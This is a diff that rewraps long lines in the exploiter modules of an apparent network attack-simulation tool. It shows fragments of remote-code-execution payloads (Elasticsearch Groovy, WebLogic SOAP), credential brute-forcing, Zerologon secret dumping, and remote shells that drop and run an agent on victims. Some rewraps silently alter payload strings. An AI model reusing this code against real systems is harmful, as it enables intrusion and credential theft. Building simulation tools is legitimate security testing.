"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
@staticmethod
@ -184,7 +187,8 @@ class ControlClient(object):
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
@staticmethod
@ -202,7 +206,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return
@ -241,7 +246,8 @@ class ControlClient(object):
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return {}
@ -310,7 +316,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
@staticmethod
@ -343,7 +350,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return None, None
@ -371,7 +379,8 @@ class ControlClient(object):
def get_pba_file(filename):
try:
return requests.get(
PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename), # noqa: DUO123
PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename),
# noqa: DUO123
verify=False,
proxies=ControlClient.proxies,
timeout=LONG_REQUEST_TIMEOUT,
@ -412,7 +421,10 @@ class ControlClient(object):
@staticmethod
def can_island_see_port(port):
try:
url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}"
url = (
f"https://{WormConfiguration.current_server}/api/monkey_control"
f"/check_remote_port/{port}"
)
response = requests.get(url, verify=False, timeout=SHORT_REQUEST_TIMEOUT)
response = json.loads(response.content.decode())
return response["status"] == "port_visible"
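One side effect of the wrapping above: flake8-style `# noqa` comments apply to the physical line they end, so moving `# noqa: DUO123` onto its own line probably stops it suppressing anything. A sketch of the placement that keeps it on the flagged line (203.0.113.7 is a test address, so the request is expected to fail):

```python
import requests

try:
    requests.post(
        "https://%s/api/telemetry" % ("203.0.113.7",),  # noqa: DUO123
        verify=False,
        timeout=1,
    )
except requests.RequestException:
    pass  # unreachable test address; only the comment placement matters here
```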

View File

@ -152,7 +152,8 @@ class MonkeyDrops(object):
)
else:
dest_path = self._config["destination_path"]
# In linux we have a more complex commandline. There's a general outer one, and the inner one which actually
# In linux we have a more complex commandline. There's a general outer one,
# and the inner one which actually
# runs the monkey
inner_monkey_cmdline = (
MONKEY_CMDLINE_LINUX % {"monkey_filename":dest_path.split("/")[-1]}
@ -188,7 +189,8 @@ class MonkeyDrops(object):
try:
if (
(self._config["source_path"].lower() != self._config["destination_path"].lower())
(self._config["source_path"].lower() != self._config[
"destination_path"].lower())
and os.path.exists(self._config["source_path"])
and WormConfiguration.dropper_try_move_first
):
@ -207,7 +209,8 @@ class MonkeyDrops(object):
dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT
):
LOG.debug(
"Error marking source file '%s' for deletion on next boot (error %d)",
"Error marking source file '%s' for deletion on next boot (error "
"%d)",
self._config["source_path"],
ctypes.windll.kernel32.GetLastError(),
)

View File

@ -10,7 +10,6 @@ from infection_monkey.utils.plugins.plugin import Plugin
__author__ = "itamar"
logger = logging.getLogger(__name__)
@ -37,7 +36,8 @@ class HostExploiter(Plugin):
EXPLOIT_TYPE = ExploitType.VULNERABILITY
# Determines if successful exploitation should stop further exploit attempts on that machine.
# Generally, should be True for RCE type exploiters and False if we don't expect the exploiter to run the monkey agent.
# Generally, should be True for RCE type exploiters and False if we don't expect the
# exploiter to run the monkey agent.
# Example: Zerologon steals credentials
RUNS_AGENT_ON_SUCCESS = True

View File

@ -1,7 +1,8 @@
"""
Remote Code Execution on Drupal server - CVE-2019-6340
Implementation is based on:
https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a.
https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88
/f9f6a5bb6605745e292bee3a4079f261d891738a.
"""
import logging
@ -28,7 +29,8 @@ class DrupalExploiter(WebRCE):
def get_exploit_config(self):
"""
We override this function because the exploits requires a special extension in the URL, "node",
We override this function because the exploits requires a special extension in the URL,
"node",
e.g. an exploited URL would be http://172.1.2.3:<port>/node/3.
:return: the Drupal exploit config
"""
@ -42,7 +44,8 @@ class DrupalExploiter(WebRCE):
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
"""
We need a specific implementation of this function in order to add the URLs *with the node IDs*.
We need a specific implementation of this function in order to add the URLs *with the
node IDs*.
We therefore check, for every potential URL, all possible node IDs.
:param potential_urls: Potentially-vulnerable URLs
:param stop_checking: Stop if one vulnerable URL is found
@ -71,7 +74,8 @@ class DrupalExploiter(WebRCE):
def check_if_exploitable(self, url):
"""
Check if a certain URL is exploitable.
We use this specific implementation (and not simply run self.exploit) because this function does not "waste"
We use this specific implementation (and not simply run self.exploit) because this
function does not "waste"
a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
:param url: Drupal's URL and port
:return: Vulnerable URL if exploitable, otherwise False
@ -117,7 +121,8 @@ class DrupalExploiter(WebRCE):
def get_target_url(self):
"""
We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL.
We're overriding this method such that every time self.exploit is invoked, we use a fresh
vulnerable URL.
Reusing the same URL eliminates its exploitability because of caching reasons :)
:return: vulnerable URL to exploit
"""
@ -128,13 +133,15 @@ class DrupalExploiter(WebRCE):
For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
:return: Whether the list of vulnerable URLs has at least 5 elements.
"""
# We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey, chmod it and run it.
# We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey,
# chmod it and run it.
num_urls_needed_for_full_exploit = 5
num_available_urls = len(self.vulnerable_urls)
result = num_available_urls >= num_urls_needed_for_full_exploit
if not result:
LOG.info(
f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server "
f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a "
f"Drupal server "
f"but only {num_available_urls} found"
)
return result

View File

@ -1,6 +1,7 @@
"""
Implementation is based on elastic search groovy exploit by metasploit
https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66/modules/exploits/multi/elasticsearch/search_groovy_script.rb
https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66
/modules/exploits/multi/elasticsearch/search_groovy_script.rb
Max vulnerable elasticsearch version is "1.4.2"
"""
@ -37,7 +38,8 @@ class ElasticGroovyExploiter(WebRCE):
)
JAVA_CMD = (
GENERIC_QUERY
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(
\\"%s\\").getText()"""
)
_TARGET_OS_TYPE = ["linux", "windows"]
@ -57,7 +59,8 @@ class ElasticGroovyExploiter(WebRCE):
return exploit_config
def get_open_service_ports(self, port_list, names):
# We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service
# We must append elastic port we get from elastic fingerprint module because It's not
# marked as 'http' service
valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names)
if ES_SERVICE in self.host.services:
valid_ports.append([ES_PORT, False])
@ -70,7 +73,8 @@ class ElasticGroovyExploiter(WebRCE):
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
except requests.ReadTimeout:
LOG.error(
"Elastic couldn't upload monkey, because server didn't respond to upload request."
"Elastic couldn't upload monkey, because server didn't respond to upload "
"request."
)
return False
result = self.get_results(response)

View File

@ -1,6 +1,7 @@
"""
Remote code execution on HADOOP server with YARN and default settings
Implementation is based on code from https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
Implementation is based on code from
https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
"""
import json
@ -63,7 +64,8 @@ class HadoopExploiter(WebRCE):
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
posixpath.join(url, "ws/v1/cluster/apps/new-application"),
timeout=LONG_REQUEST_TIMEOUT
)
resp = json.loads(resp.content)
app_id = resp["application-id"]
@ -73,7 +75,8 @@ class HadoopExploiter(WebRCE):
)
payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload,
timeout=LONG_REQUEST_TIMEOUT
)
return resp.status_code == 202
@ -90,7 +93,8 @@ class HadoopExploiter(WebRCE):
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
self.host, get_monkey_depth() - 1,
vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
)
if "linux" in self.host.os["type"]:
base_command = HADOOP_LINUX_COMMAND

View File

@ -56,7 +56,8 @@ class MSSQLExploiter(HostExploiter):
def _exploit_host(self):
"""
First this method brute forces to get the mssql connection (cursor).
Also, don't forget to start_monkey_server() before self.upload_monkey() and self.stop_monkey_server() after
Also, don't forget to start_monkey_server() before self.upload_monkey() and
self.stop_monkey_server() after
"""
# Brute force to get connection
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
@ -181,10 +182,12 @@ class MSSQLExploiter(HostExploiter):
Args:
host (str): Host ip address
port (str): Tcp port that the host listens to
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce
with
Return:
True or False depends if the whole bruteforce and attack process was completed successfully or not
True or False depends if the whole bruteforce and attack process was completed
successfully or not
"""
# Main loop
# Iterates on users list
@ -196,9 +199,9 @@ class MSSQLExploiter(HostExploiter):
host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT
)
LOG.info(
"Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}".format(
host, user, self._config.hash_sensitive_data(password)
)
"Successfully connected to host: {0}, using user: {1}, password ("
"SHA-512): {2}".format(host, user,
self._config.hash_sensitive_data(password))
)
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password)

View File

@ -54,7 +54,8 @@ LOG = logging.getLogger(__name__)
class SambaCryExploiter(HostExploiter):
"""
SambaCry exploit module, partially based on the following implementation by CORE Security Technologies' impacket:
SambaCry exploit module, partially based on the following implementation by CORE Security
Technologies' impacket:
https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py
"""
@ -194,7 +195,8 @@ class SambaCryExploiter(HostExploiter):
file_content = None
try:
file_id = smb_client.openFile(
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
desiredAccess=FILE_READ_DATA
)
file_content = smb_client.readFile(tree_id, file_id)
smb_client.closeFile(tree_id, file_id)
@ -372,7 +374,8 @@ class SambaCryExploiter(HostExploiter):
# the extra / on the beginning is required for the vulnerability
self.open_pipe(smb_client, "/" + module_path)
except Exception as e:
# This is the expected result. We can't tell whether we succeeded or not just by this error code.
# This is the expected result. We can't tell whether we succeeded or not just by this
# error code.
if str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
return True
else:
@ -403,7 +406,8 @@ class SambaCryExploiter(HostExploiter):
return BytesIO(
DROPPER_ARG
+ build_monkey_commandline(
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT,
str(location)
)
)
@ -450,7 +454,8 @@ class SambaCryExploiter(HostExploiter):
)
return smb_client
# Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability #
# Following are slightly modified SMB functions from impacket to fit our needs of the
# vulnerability #
@staticmethod
def create_smb(
smb_client,
@ -513,7 +518,8 @@ class SambaCryExploiter(HostExploiter):
@staticmethod
def open_pipe(smb_client, pathName):
# We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style
# We need to overwrite Impacket's openFile functions since they automatically convert
# paths to NT style
# to make things easier for the caller. Not this time ;)
treeId = smb_client.connectTree("IPC$")
LOG.debug("Triggering path: %s" % pathName)

View File

@ -1,4 +1,5 @@
# Implementation is based on shellshock script provided https://github.com/nccgroup/shocker/blob/master/shocker.py
# Implementation is based on shellshock script provided
# https://github.com/nccgroup/shocker/blob/master/shocker.py
import logging
import string
@ -113,7 +114,8 @@ class ShellShockExploiter(HostExploiter):
self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)
):
LOG.info(
"Host %s was already infected under the current configuration, done" % self.host
"Host %s was already infected under the current configuration, "
"done" % self.host
)
return True # return already infected
@ -270,7 +272,8 @@ class ShellShockExploiter(HostExploiter):
break
if timeout:
LOG.debug(
"Some connections timed out while sending request to potentially vulnerable urls."
"Some connections timed out while sending request to potentially vulnerable "
"urls."
)
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps]

View File

@ -75,7 +75,8 @@ class SmbExploiter(HostExploiter):
if remote_full_path is not None:
LOG.debug(
"Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
"Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) "
"%s : (SHA-512) %s)",
self.host,
user,
self._config.hash_sensitive_data(password),
@ -99,7 +100,8 @@ class SmbExploiter(HostExploiter):
except Exception as exc:
LOG.debug(
"Exception when trying to copy file using SMB to %r with user:"
" %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s: (%s)",
" %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
"SHA-512): %s: (%s)",
self.host,
user,
self._config.hash_sensitive_data(password),

View File

@ -58,7 +58,8 @@ class SSHExploiter(HostExploiter):
try:
ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
LOG.debug(
"Successfully logged in %s using %s users private key", self.host, ssh_string
"Successfully logged in %s using %s users private key", self.host,
ssh_string
)
self.report_login_attempt(True, user, ssh_key=ssh_string)
return ssh
@ -157,7 +158,8 @@ class SSHExploiter(HostExploiter):
if stdout_res:
# file exists
LOG.info(
"Host %s was already infected under the current configuration, done" % self.host
"Host %s was already infected under the current configuration, "
"done" % self.host
)
return True # return already infected

View File

@ -35,7 +35,8 @@ class Struts2Exploiter(WebRCE):
def build_potential_urls(self, ports, extensions=None):
"""
We need to override this method to get redirected url's
:param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
:param ports: Array of ports. One port is described as size 2 array: [port.no(int),
isHTTPS?(bool)]
Eg. ports: [[80, False], [443, True]]
:param extensions: What subdirectories to scan. www.domain.com[/extension]
:return: Array of url's to try and attack
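A sketch of the URL construction the docstring above describes; host is passed in explicitly here, whereas the real method takes it from self.host:

```python
def build_potential_urls(host, ports, extensions=None):
    urls = []
    for port, is_https in ports:
        scheme = "https" if is_https else "http"
        for extension in extensions or [""]:
            urls.append(f"{scheme}://{host}:{port}/{extension.lstrip('/')}")
    return urls


print(build_potential_urls("10.0.0.5", [[80, False], [443, True]], ["index.php"]))
# ['http://10.0.0.5:80/index.php', 'https://10.0.0.5:443/index.php']
```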

View File

@ -29,7 +29,8 @@ def get_target_monkey(host):
if not monkey_path:
if host.os.get("type") == platform.system().lower():
# if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe
# if exe not found, and we have the same arch or arch is unknown and we are 32bit,
# use our exe
if (not host.os.get("machine") and sys.maxsize < 2 ** 32) or host.os.get(
"machine", ""
).lower() == platform.machine().lower():

View File

@ -17,7 +17,8 @@ class Payload(object):
def get_payload(self, command=""):
"""
Returns prefixed and suffixed command (payload)
:param command: Command to suffix/prefix. If no command is passed than objects' property is used
:param command: Command to suffix/prefix. If no command is passed than objects' property
is used
:return: prefixed and suffixed command (full payload)
"""
if not command:
@ -46,7 +47,8 @@ class LimitedSizePayload(Payload):
def split_into_array_of_smaller_payloads(self):
if self.is_suffix_and_prefix_too_long():
raise Exception(
"Can't split command into smaller sub-commands because commands' prefix and suffix already "
"Can't split command into smaller sub-commands because commands' prefix and "
"suffix already "
"exceeds required length of command."
)

View File

@ -32,7 +32,8 @@ class TestPayload(TestCase):
pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix")
array2 = pld2.split_into_array_of_smaller_payloads()
test2 = bool(
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(array2) == 2
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(
array2) == 2
)
assert test1 and test2
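A sketch of the splitting behaviour the test above exercises, assuming each chunk plus prefix and suffix must fit within max_length (the real LimitedSizePayload raises when prefix and suffix alone leave no room, per the earlier hunk):

```python
def split_into_array_of_smaller_payloads(command, max_length, prefix, suffix):
    room = max_length - len(prefix) - len(suffix)
    if room <= 0:
        raise Exception(
            "Can't split command into smaller sub-commands because commands' "
            "prefix and suffix already exceeds required length of command."
        )
    return [
        prefix + command[i:i + room] + suffix for i in range(0, len(command), room)
    ]


print(split_into_array_of_smaller_payloads("12345678", 16, "prefix", "suffix"))
# ['prefix1234suffix', 'prefix5678suffix']
```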

View File

@ -36,7 +36,8 @@ class SmbTools(object):
# skip guest users
if smb.isGuestSession() > 0:
LOG.debug(
"Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s',"
"Connection to %r granted guest privileges with user: %s, password (SHA-512): "
"'%s',"
" LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
host,
username,
@ -127,7 +128,8 @@ class SmbTools(object):
smb.connectTree(share_name)
except Exception as exc:
LOG.debug(
"Error connecting tree to share '%s' on victim %r: %s", share_name, host, exc
"Error connecting tree to share '%s' on victim %r: %s", share_name, host,
exc
)
continue
@ -151,7 +153,8 @@ class SmbTools(object):
return remote_full_path
LOG.debug(
"Remote monkey file is found but different, moving along with attack"
"Remote monkey file is found but different, moving along with "
"attack"
)
except Exception:
pass # file isn't found on remote victim, moving on
@ -164,7 +167,8 @@ class SmbTools(object):
file_uploaded = True
T1105Telem(
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr,
dst_path
).send()
LOG.info(
"Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
@ -177,7 +181,8 @@ class SmbTools(object):
break
except Exception as exc:
LOG.debug(
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host,
exc
)
T1105Telem(
ScanStatus.SCANNED,
@ -197,7 +202,8 @@ class SmbTools(object):
if not file_uploaded:
LOG.debug(
"Couldn't find a writable share for exploiting victim %r with "
"username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
"username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
"SHA-512): %s",
host,
username,
Configuration.hash_sensitive_data(password),

View File

@ -1,6 +1,7 @@
"""
Implementation is based on VSFTPD v2.3.4 Backdoor Command Execution exploit by metasploit
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp
/vsftpd_234_backdoor.rb
only vulnerable version is "2.3.4"
"""
@ -151,7 +152,8 @@ class VSFTPDExploiter(HostExploiter):
}
# Set unlimited to memory
# we don't have to revert the ulimit because it just applies to the shell obtained by our exploit
# we don't have to revert the ulimit because it just applies to the shell obtained by our
# exploit
run_monkey = ULIMIT_V + UNLIMITED + run_monkey
run_monkey = str.encode(str(run_monkey) + "\n")
time.sleep(FTP_TIME_BUFFER)

View File

@ -69,21 +69,27 @@ class WebRCE(HostExploiter):
"""
exploit_config = {}
# dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
# dropper: If true monkey will use dropper parameter that will detach monkey's process
# and try to copy
# it's file to the default destination path.
exploit_config["dropper"] = False
# upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
# Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used.
# upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,
# 'windows': WIN_CMD}
# Command must have "monkey_path" and "http_path" format parameters. If None defaults
# will be used.
exploit_config["upload_commands"] = None
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home",
# "index.php"]
exploit_config["url_extensions"] = []
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found
# vulnerable.
exploit_config["stop_checking_urls"] = False
# blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
# blind_exploit: If true we won't check if file exist and won't try to get the
# architecture of target.
exploit_config["blind_exploit"] = False
return exploit_config
@ -200,7 +206,8 @@ class WebRCE(HostExploiter):
except KeyError:
LOG.error(
"Provided command is missing/bad for this type of host! "
"Check upload_monkey function docs before using custom monkey's upload commands."
"Check upload_monkey function docs before using custom monkey's upload "
"commands."
)
return False
return command
@ -225,8 +232,10 @@ class WebRCE(HostExploiter):
def build_potential_urls(self, ports, extensions=None):
"""
Build all possibly-vulnerable URLs on a specific host, based on the relevant ports and extensions.
:param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
Build all possibly-vulnerable URLs on a specific host, based on the relevant ports and
extensions.
:param ports: Array of ports. One port is described as size 2 array: [port.no(int),
isHTTPS?(bool)]
Eg. ports: [[80, False], [443, True]]
:param extensions: What subdirectories to scan. www.domain.com[/extension]
:return: Array of url's to try and attack
@ -253,7 +262,8 @@ class WebRCE(HostExploiter):
"""
Gets vulnerable url(s) from url list
:param urls: Potentially vulnerable urls
:param stop_checking: If we want to continue checking for vulnerable url even though one is found (bool)
:param stop_checking: If we want to continue checking for vulnerable url even though one
is found (bool)
:return: None (we append to class variable vulnerable_urls)
"""
for url in urls:
@ -330,7 +340,8 @@ class WebRCE(HostExploiter):
Get ports wrapped with log
:param ports: Potential ports to exploit. For example WormConfiguration.HTTP_PORTS
:param names: [] of service names. Example: ["http"]
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [
port.nr, IsHTTPS?]
"""
ports = self.get_open_service_ports(ports, names)
if not ports:
@ -350,7 +361,8 @@ class WebRCE(HostExploiter):
def run_backup_commands(self, resp, url, dest_path, http_path):
"""
If you need multiple commands for the same os you can override this method to add backup commands
If you need multiple commands for the same os you can override this method to add backup
commands
:param resp: Response from base command
:param url: Vulnerable url
:param dest_path: Where to upload monkey
@ -370,7 +382,8 @@ class WebRCE(HostExploiter):
def upload_monkey(self, url, commands=None):
"""
:param url: Where exploiter should send it's request
:param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows': WIN_CMD}
:param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows':
WIN_CMD}
Command must have "monkey_path" and "http_path" format parameters.
:return: {'response': response/False, 'path': monkeys_path_in_host}
"""
@ -435,7 +448,8 @@ class WebRCE(HostExploiter):
return False
elif "No such file or directory" in resp:
LOG.error(
"Could not change permission because monkey was not found. Check path parameter."
"Could not change permission because monkey was not found. Check path "
"parameter."
)
return False
LOG.info("Permission change finished")
@ -499,7 +513,8 @@ class WebRCE(HostExploiter):
def get_monkey_upload_path(self, url_to_monkey):
"""
Gets destination path from one of WEB_RCE predetermined paths(self.monkey_target_paths).
:param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe
:param url_to_monkey: Hosted monkey's url. egz :
http://localserver:9999/monkey/windows-32.exe
:return: Corresponding monkey path from self.monkey_target_paths
"""
if not url_to_monkey or ("linux" not in url_to_monkey and "windows" not in url_to_monkey):
@ -522,7 +537,8 @@ class WebRCE(HostExploiter):
return False
except KeyError:
LOG.error(
'Unknown key was found. Please use "linux", "win32" and "win64" keys to initialize '
'Unknown key was found. Please use "linux", "win32" and "win64" keys to '
"initialize "
"custom dict of monkey's destination paths"
)
return False
@ -577,8 +593,10 @@ class WebRCE(HostExploiter):
def are_vulnerable_urls_sufficient(self):
"""
Determine whether the number of vulnerable URLs is sufficient in order to perform the full attack.
Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a vulnerable URL is for
Determine whether the number of vulnerable URLs is sufficient in order to perform the
full attack.
Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a
vulnerable URL is for
single use, thus we need a couple of them.
:return: Whether or not a full attack can be performed using the available vulnerable URLs.
"""

View File

@ -160,7 +160,8 @@ class WebLogic201710271(WebRCE):
:param command: command itself
:return: Formatted payload
"""
empty_payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
empty_payload = """<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
@ -195,7 +196,8 @@ class WebLogic201710271(WebRCE):
:param port: Server's port
:return: Formatted payload
"""
generic_check_payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
generic_check_payload = """<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
@ -272,7 +274,8 @@ class WebLogic20192725(WebRCE):
return exploit_config
def execute_remote_monkey(self, url, path, dropper=False):
# Without delay exploiter tries to launch monkey file that is still finishing up after downloading.
# Without delay exploiter tries to launch monkey file that is still finishing up after
# downloading.
time.sleep(WebLogic20192725.DELAY_BEFORE_EXPLOITING_SECONDS)
super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper)
@ -307,7 +310,8 @@ class WebLogic20192725(WebRCE):
"""
empty_payload = """
<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"
xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>

View File

@ -66,7 +66,9 @@ class WmiExploiter(HostExploiter):
continue
except socket.error:
LOG.debug(
("Network error in WMI connection to %r with " % self.host) + creds_for_logging
(
"Network error in WMI connection to %r with " % self.host) +
creds_for_logging
)
return False
except Exception as exc:
@ -142,7 +144,8 @@ class WmiExploiter(HostExploiter):
success = True
else:
LOG.debug(
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
"cmdline=%r)",
remote_full_path,
self.host,
result.ProcessId,

View File

@ -1,6 +1,7 @@
"""
Zerologon, CVE-2020-1472
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and
https://github.com/risksense/zerologon/.
"""
import logging
@ -54,7 +55,8 @@ class ZerologonExploiter(HostExploiter):
else:
LOG.info(
"Exploit not attempted. Target is most likely patched, or an error was encountered."
"Exploit not attempted. Target is most likely patched, or an error was "
"encountered."
)
return False
@ -131,7 +133,8 @@ class ZerologonExploiter(HostExploiter):
self.report_login_attempt(result=False, user=self.dc_name)
_exploited = False
LOG.info(
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something went wrong."
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something "
f"went wrong."
)
return _exploited
@ -194,7 +197,8 @@ class ZerologonExploiter(HostExploiter):
def get_all_user_creds(self) -> List[Tuple[str, Dict]]:
try:
options = OptionsForSecretsdump(
target=f"{self.dc_name}$@{self.dc_ip}", # format for DC account - "NetBIOSName$@0.0.0.0"
target=f"{self.dc_name}$@{self.dc_ip}",
# format for DC account - "NetBIOSName$@0.0.0.0"
target_ip=self.dc_ip,
dc_ip=self.dc_ip,
)
@ -221,7 +225,8 @@ class ZerologonExploiter(HostExploiter):
except Exception as e:
LOG.info(
f"Exception occurred while dumping secrets to get some username and its password's NT hash: {str(e)}"
f"Exception occurred while dumping secrets to get some username and its "
f"password's NT hash: {str(e)}"
)
return None
@ -310,7 +315,8 @@ class ZerologonExploiter(HostExploiter):
except Exception as e:
LOG.info(
f"Exception occurred while dumping secrets to get original DC password's NT hash: {str(e)}"
f"Exception occurred while dumping secrets to get original DC password's NT "
f"hash: {str(e)}"
)
finally:
@ -325,7 +331,8 @@ class ZerologonExploiter(HostExploiter):
)
wmiexec = Wmiexec(
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), domain=self.dc_ip
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes),
domain=self.dc_ip
)
remote_shell = wmiexec.get_remote_shell()
